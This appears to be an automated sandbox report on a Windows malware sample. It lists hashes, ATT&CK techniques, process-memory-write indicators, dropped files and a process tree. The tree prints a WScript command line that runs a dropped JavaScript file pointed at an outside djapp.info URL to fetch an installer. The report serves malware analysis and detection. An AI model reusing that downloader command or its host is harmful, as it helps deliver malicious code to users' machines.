149f8a8d6a32d50c23fd889b71b99be0b292bc3560da7b2c4205671046233999

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
17/05/2024, 03:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe
Size

184KB
MD5

4e5153e92114039ec3395ecbfe302ee3
SHA1

98906e7e788172fb49d405f0ae79b11db35d1b20
SHA256

149f8a8d6a32d50c23fd889b71b99be0b292bc3560da7b2c4205671046233999
SHA512

10ae7daea564c1795106255ca6111aeacb0e4ba820973ad83a9e8d2fcf5a12209dc588add2b9f992cf39a15949e4d87ef849a480d0aea2edfcfdbb9d951889ac
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO34:/7BSH8zUB+nGESaaRvoB7FJNndnV

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2204	WScript.exe
8	2204	WScript.exe
10	2204	WScript.exe
12	2556	WScript.exe
13	2556	WScript.exe
15	2580	WScript.exe
16	2580	WScript.exe
18	2428	WScript.exe
19	2428	WScript.exe
21	1576	WScript.exe
22	1576	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1300 wrote to memory of 2204	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	28
PID 1300 wrote to memory of 2204	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	28
PID 1300 wrote to memory of 2204	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	28
PID 1300 wrote to memory of 2204	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	28
PID 1300 wrote to memory of 2556	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	30
PID 1300 wrote to memory of 2556	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	30
PID 1300 wrote to memory of 2556	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	30
PID 1300 wrote to memory of 2556	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	30
PID 1300 wrote to memory of 2580	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	32
PID 1300 wrote to memory of 2580	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	32
PID 1300 wrote to memory of 2580	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	32
PID 1300 wrote to memory of 2580	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	32
PID 1300 wrote to memory of 2428	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	34
PID 1300 wrote to memory of 2428	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	34
PID 1300 wrote to memory of 2428	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	34
PID 1300 wrote to memory of 2428	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	34
PID 1300 wrote to memory of 1576	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	36
PID 1300 wrote to memory of 1576	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	36
PID 1300 wrote to memory of 1576	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	36
PID 1300 wrote to memory of 1576	1300	4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4e5153e92114039ec3395ecbfe302ee3_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2D86.js" http://www.djapp.info/?domain=ZCfITwJEtP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2D86.exe
  2⤵
  - Blocklisted process makes network request
  PID:2204
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2D86.js" http://www.djapp.info/?domain=ZCfITwJEtP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2D86.exe
  2⤵
  - Blocklisted process makes network request
  PID:2556
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2D86.js" http://www.djapp.info/?domain=ZCfITwJEtP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2D86.exe
  2⤵
  - Blocklisted process makes network request
  PID:2580
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2D86.js" http://www.djapp.info/?domain=ZCfITwJEtP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2D86.exe
  2⤵
  - Blocklisted process makes network request
  PID:2428
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2D86.js" http://www.djapp.info/?domain=ZCfITwJEtP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2D86.exe
  2⤵
  - Blocklisted process makes network request
  PID:1576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
3649141bc6cdb9e1cdfc5870b5d05bab

SHA1
5c8463fb14e24fbcfac78e811bfa019a318d629b

SHA256
99764867727467a84a063512315f6c9012b07ddb7d098ed18c710d06ccf79e39

SHA512
1ad93cb6bbe222baad6c2913a0ef3ae046777baa8911218954423c172290f01463aba2be25a12aac84de98cae640d6e5a9755923647ec3bf497af99650d846f9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
f8ab6239ea7f3e79b34b547bb6e33f06

SHA1
32395ac355327c5973d59959be26959315ee8026

SHA256
d4f2403ba48cd71284a1da46a6c9f0e539b8ce41a0104772e5f523c35d0eddaf

SHA512
894f6d26e7f7bee1f9d7c0393d8f123e3a1d7608e5d0eee61519efbb51ec3867256287fb5b5cd94094d40330f96734db64f1717d22f9761227514db805961a47

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
b516ae3f88242e77ac25d4f6d38a9d5e

SHA1
03a5cb80425e5c42bb00a3120ffe000b4c2f92e4

SHA256
935820202fecb321394be64e4477f885b0d462b4be4748b00ddb14650e590321

SHA512
2ba86a6334edcfebcb539706479ddb3dae0e71a7ac20db3c3f328cc8b5fc9ad2eff114329e164b97453946eb9f26b39cd36bca8c6f61f0180a570991eebb116a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
451ffad76518f035c6ab5acd2a1f0023

SHA1
f43ea4e752d94f3bf80b54e1431899642ea086fb

SHA256
1d165040eb7e73bdb42c02a41818b8d96ebcc8dc732ec5f2d413cd83e303bf0d

SHA512
5eac75d10c32f2a7ad44d54998a5eec1d002ffbe8f63ae892650a02a91004547251d94b525cf3a37e95a7dc5161eb2d95843564e610b0c48eba93af251de64d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

Filesize
40KB

MD5
acb3811c5f91aa2d4392d875998a56c4

SHA1
6b650e4c4571ca7a02e33b72849e66de86fe219c

SHA256
55eccd07d2e3dc39ad5bf4163e219c0ce0e377ab2e59d880747315d8048fffc3

SHA512
2109e31b8f292bf3525819ecf25990211683d900fce5204c81709ce21faa16717cd68df788e7f985bf6e075b9ca7ed0bfa6400346fea5694529baf95c882e177

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htm

Filesize
6KB

MD5
7a3ec72098af949a339c6f13e82b3b4b

SHA1
9c4acd964982c5d8973aeb7d2930f844a0bc0382

SHA256
fdadc9c42ad19c29102a530891862c40150885c0cc3f80f8d501d0d1c1266a4a

SHA512
e250101bccd1c85ce91ea86454d3ffde9b00a31c6817d0014d9819812ad068d3b76d52c58a1b2c55d5ad0c568ca92d2035c0d9a5ee59d48b211a17e841a512a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

Filesize
40KB

MD5
e06b0a7bf64458ad3d158e613a240df6

SHA1
960cd2daa1e6f17e9212d51235cf26d1e850077e

SHA256
d48c5ada30e51e67bfc7e257abbdcbb77b70516b52433a795f15bf82fefcf1d0

SHA512
0206c0e387e635cb8cbc662d30d5b9cf0c657d5d2f9fe91768225824bd9baa7dc1c8b1851057467e6b7a45f24ce916b23cb6499023f951836a47af85c2abd4ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htm

Filesize
40KB

MD5
77b16d8a4625ea52c2d5e2588c0e389b

SHA1
f5ddf4ed425bfd48320aa1a84516be7aa9c820ff

SHA256
56a64a9bb53b65c6bd4d03275b78a85eb8b89df9a59496a420f69f0bfc6020c6

SHA512
9d7ad34b7cc9145b69c92f05318b172a95bbc21be44586b6080c4f5e1032f1c2f9a68cfccc73243b550125d78b4a0c7218915119ad050bb10df8357e0835b54e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5CEF.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar756F.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf2D86.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SOXWUX8T.txt

Filesize
177B

MD5
d2171619a78bf5c7a7f2b38996cddb1e

SHA1
47190be18e23b1cf28e7210aff9d7ecca48df9a8

SHA256
78647aaded2b902150480668e88feea2e3cb6e20d9b3e9a7e57eacca3d916b39

SHA512
c7f8492b36759ca620d3fc0de8ecf09bd68805f62463dd3801b1881d403295bed7d12084aca51eba5033b829ddce16e35cee2e8d67eae05828c47bcf04850202

Download Submit